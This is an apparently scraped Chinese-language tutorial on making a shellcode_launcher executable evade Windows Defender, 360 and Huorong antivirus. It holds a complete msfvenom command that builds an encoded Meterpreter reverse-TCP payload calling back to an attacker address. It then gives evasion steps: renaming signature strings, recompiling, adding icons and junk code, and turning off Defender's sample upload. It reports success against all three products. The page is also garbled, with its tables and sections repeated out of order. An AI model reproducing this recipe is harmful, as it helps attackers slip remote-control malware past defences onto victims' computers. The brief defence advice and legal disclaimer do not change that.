Shellcode Launcher免杀Windows Defender技术分析<\/h1>

1. 概述<\/h2>
本文档详细分析了一种基于shellcode_launcher的Windows Defender免杀技术，适用于网络安全研究人员进行防御性研究。该技术通过源代码修改和编译技巧，实现了对最新版Windows Defender、360和火绒的静态和动态免杀。<\/p>

2. 环境准备<\/h2>

2.1 测试环境配置<\/h3>

攻击机<\/strong>:<\/p>

系统: Mac OS<\/li>
IP: 10.211.55.2<\/li>
工具: MSF6<\/li> <\/ul> <\/li>

测试机1<\/strong>:<\/p>

系统: Windows10<\/li>
IP: 10.211.55.3<\/li>
安全软件: 360最新版、Windows Defender最新版<\/li> <\/ul> <\/li>

测试机2<\/strong>:<\/p>

系统: Windows7<\/li>
IP: 10.211.55.9<\/li>
安全软件: 火绒最新版<\/li> <\/ul> <\/li>

测试机3<\/strong>:<\/p>

系统: Windows Server 2019<\/li>
IP: 192.168.238.145<\/li>
安全软件: 火绒最新版、Windows Defender最新版<\/li> <\/ul> <\/li> <\/ul>
2.2 工具准备<\/h3>

shellcode_launcher<\/strong>:<\/p>

项目地址: https:\/\/github.com\/clinicallyinane\/shellcode_launcher\/<\/li>
备用地址: https:\/\/github.com\/crow821\/crowsec\/tree\/master\/BypassAv_new_shellcode_launcher1.1<\/li> <\/ul> <\/li>

编译环境<\/strong>:<\/p>

Visual Studio 2012<\/li> <\/ul> <\/li> <\/ul>
3. 技术实现<\/h2>
3.1 Shellcode生成<\/h3>
使用MSFvenom生成混淆后的shellcode:<\/p>
msfvenom -p windows\/meterpreter\/reverse_tcp -e x86\/shikata_ga_nai -i 6<\/span> -b '\x00'<\/span> lhost=<\/span>10.211.55.2 lport=<\/span>1234<\/span> -f raw -o shellcode.raw <\/span><\/span><\/code><\/pre>注意<\/strong>: 虽然shikata_ga_nai编码可过部分AV，但在VT上仍有杀软可识别其特征。<\/p> 3.2 基础免杀测试<\/h3> 3.2.1 原始文件测试<\/h4> 直接使用GitHub下载的shellcode_launcher.exe: 360联网查杀: 立即检测为木马<\/li> 火绒: 立即检测为威胁<\/li> <\/ul> <\/li> <\/ul> 3.2.2 源代码编译测试<\/h4> 使用VS2012打开源代码<\/li> 不做任何修改直接编译<\/li> 重命名生成文件为_av.exe<\/code>和crow_test_av.raw<\/code><\/li> 测试结果: 360: 静态免杀成功<\/li> 火绒: 仍被检测<\/li> <\/ul> <\/li> <\/ol> 3.3 火绒免杀技术<\/h3> 3.3.1 特征分析<\/h4> 使用strings提取可执行文件字符串:<\/p> strings.exe crow_test_av.exe > 0115.txt <\/span><\/span><\/code><\/pre>发现关键特征字符串shellcode_launcher.exe<\/code>。<\/p> 3.3.2 修改策略<\/h4> 替换关键字:<\/p> 将shellcode_launcher<\/code>替换为hello_crow<\/code><\/li> 共修改3处<\/li> <\/ul> <\/li> 注释\/删除可疑代码段<\/p> <\/li> 重新编译并重命名为a.exe<\/code><\/p> <\/li> <\/ol> 结果<\/strong>: 成功绕过火绒检测<\/p> 3.4 Windows Defender免杀<\/h3> 3.4.1 环境配置<\/h4> 确保Windows Defender开启<\/li> 关闭360(防止冲突)<\/li> 关闭Windows Defender的样本自动上传功能<\/li> <\/ol> 3.4.2 测试结果<\/h4> 静态检测:<\/p> 修改后的a.exe<\/code>: 通过<\/li> 直接编译的crow_test_av.exe<\/code>: 通过<\/li> 原始shellcode_launcher.exe<\/code>: 被检测<\/li> <\/ul> <\/li> 动态检测:<\/p> 修改后的文件均可正常上线<\/li> <\/ul> <\/li> <\/ul> 3.5 增强免杀技术<\/h3> 3.5.1 添加图标<\/h4> 在VS项目中添加资源<\/li> 导入ICO文件(可使用在线生成器: http:\/\/www.bitbug.net\/)<\/li> 重新编译<\/li> <\/ol> 3.5.2 代码混淆<\/h4> 添加无关C++文件<\/li> 插入无意义代码段<\/li> 重新编译增强混淆效果<\/li> <\/ol> 4. 技术总结<\/h2> 4.1 免杀效果<\/h3> 安全产品<\/th> 静态检测<\/th> 动态检测<\/th> <\/tr> <\/thead> 360最新版<\/td> ✓<\/td> ✓<\/td> <\/tr> 火绒最新版<\/td> ✓<\/td> ✓<\/td> <\/tr> Windows Defender<\/td> ✓<\/td> ✓<\/td> <\/tr> <\/tbody> <\/table> 4.2 技术要点<\/h3> 源代码编译优于直接使用二进制<\/strong>: 直接编译可绕过部分特征检测<\/li> 关键字符串修改<\/strong>: 替换项目相关特征字符串<\/li> 代码混淆<\/strong>: 添加无关代码增加分析难度<\/li> 资源修改<\/strong>: 添加图标等资源降低可疑度<\/li> 环境配置<\/strong>: 关闭自动样本上传功能<\/li> <\/ol> 4.3 局限性<\/h3> MSFvenom生成的shellcode仍可能被部分AV检测<\/li> 动态行为检测仍是免杀最大挑战<\/li> 免杀效果具有时效性，需持续更新技术<\/li> <\/ol> 5. 防御建议<\/h2> 启用多引擎扫描机制<\/li> 保持安全软件更新至最新版本<\/li> 监控可疑进程行为而非仅依赖静态扫描<\/li> 限制未知来源可执行文件运行<\/li> 启用EDR类解决方案增强行为检测<\/li> <\/ol> 6. 法律声明<\/h2> 本文档所有技术内容仅供网络安全研究使用，任何未经授权的渗透测试行为均属违法。使用者应对其行为负全部法律责任，作者不对任何滥用行为负责。请确保在合法授权范围内进行安全测试，并在测试后24小时内删除所有相关工具文件。<\/p>

安全产品<\/th>	静态检测<\/th>	动态检测<\/th> <\/tr> <\/thead>
360最新版<\/td>	✓<\/td>	✓<\/td> <\/tr>
火绒最新版<\/td>	✓<\/td>	✓<\/td> <\/tr>
Windows Defender<\/td>	✓<\/td>	✓<\/td> <\/tr> <\/tbody> <\/table> 4.2 技术要点<\/h3> 源代码编译优于直接使用二进制<\/strong>: 直接编译可绕过部分特征检测<\/li> 关键字符串修改<\/strong>: 替换项目相关特征字符串<\/li> 代码混淆<\/strong>: 添加无关代码增加分析难度<\/li> 资源修改<\/strong>: 添加图标等资源降低可疑度<\/li> 环境配置<\/strong>: 关闭自动样本上传功能<\/li> <\/ol> 4.3 局限性<\/h3> MSFvenom生成的shellcode仍可能被部分AV检测<\/li> 动态行为检测仍是免杀最大挑战<\/li> 免杀效果具有时效性，需持续更新技术<\/li> <\/ol> 5. 防御建议<\/h2> 启用多引擎扫描机制<\/li> 保持安全软件更新至最新版本<\/li> 监控可疑进程行为而非仅依赖静态扫描<\/li> 限制未知来源可执行文件运行<\/li> 启用EDR类解决方案增强行为检测<\/li> <\/ol> 6. 法律声明<\/h2> 本文档所有技术内容仅供网络安全研究使用，任何未经授权的渗透测试行为均属违法。使用者应对其行为负全部法律责任，作者不对任何滥用行为负责。请确保在合法授权范围内进行安全测试，并在测试后24小时内删除所有相关工具文件。<\/p>

Shellcode Launcher免杀Windows Defender技术分析<\/h1>

1. 概述<\/h2> 本文档详细分析了一种基于shellcode_launcher的Windows Defender免杀技术，适用于网络安全研究人员进行防御性研究。该技术通过源代码修改和编译技巧，实现了对最新版Windows Defender、360和火绒的静态和动态免杀。<\/p>

2. 环境准备<\/h2>

3. 技术实现<\/h2>

3.3 火绒免杀技术<\/h3>

3.5 增强免杀技术<\/h3>

4. 技术总结<\/h2>

1. 概述<\/h2>
本文档详细分析了一种基于shellcode_launcher的Windows Defender免杀技术，适用于网络安全研究人员进行防御性研究。该技术通过源代码修改和编译技巧，实现了对最新版Windows Defender、360和火绒的静态和动态免杀。<\/p>